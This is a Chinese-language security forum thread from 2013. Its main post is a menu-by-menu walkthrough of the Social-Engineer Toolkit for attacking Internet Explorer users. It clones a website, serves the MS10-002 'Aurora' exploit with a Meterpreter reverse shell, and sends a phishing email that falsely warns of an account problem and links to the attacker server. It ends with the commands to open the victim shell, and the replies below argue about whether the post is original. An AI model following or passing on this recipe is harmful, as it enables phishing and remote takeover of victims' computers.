[光棍节征文]一客户端的web攻击（主要针对ODAY的IE浏览器）

backlion

利用set社会工程包发动对IE浏览器的攻击：
root@btR3#cd /pentest/exploits/set（进入set工具包目录）
root@btR3#./set（编译set工具包）
set#1 (选择社会工程学攻击）
set#2 (选择web攻击向量）
set#2 (选择metasploitIE浏览器攻击）
set#2 (选择站点克隆）
set#yes (选择是否使用NAT端口转换，如在内网选择YES)
set#192.168.0.71 (输入SET攻击者服务器）
set#yes (选择是否加载端口到反弹SHELL中，选择是）
set#192.168.0.71 (输入反弹SEHLL地址）
set#http://www.backlion.com (选择克隆的网页地址）
set#24 (选择IE AURORA渗透模块）
set#2 (选择meterpteter反弹式攻击负载）
set#回车 （回车使用433端口）
set#1 (选择单独发送邮箱攻击）
set#895098355@qq.com (攻击的邮箱）
set#1 （选择使用GOOGLE邮箱）
set#backlion@gmail.com (输入你的google邮箱）
set#输入你的邮箱密码
set#选择YES （是不是高优先标签，选择YES）
set#EMAIL subject:你的邮箱账号存在异常，请修改 （EMAIL的标
题）
set#H （发送文件以什么格式，默认选择H)
set#输入发送信息内容“请点击连接地址进行修改！
：http://192.168.0.175″ 按CRT+C结束,然后回车确认！
msf exploit(ms10_002-aurora)>background
msf exploit(handler)> sessios -i 1
shellmeterpreter>shell

Free_小东

楼主也太没节操了  已经声明不能转载了

backlion

Free_小东 发表于 2013-11-12 21:47
楼主也太没节操了  已经声明不能转载了

这不是我的原创是谁的，我亲自写的！还有假吗？

backlion

Free_小东 发表于 2013-11-12 21:47
楼主也太没节操了  已经声明不能转载了

这不是我的原创是谁的，我亲自写的！还有假吗？

Free_小东

backlion 发表于 2013-11-13 00:30
这不是我的原创是谁的，我亲自写的！还有假吗？

刚刚在法克看到了  可是基友你这没图啊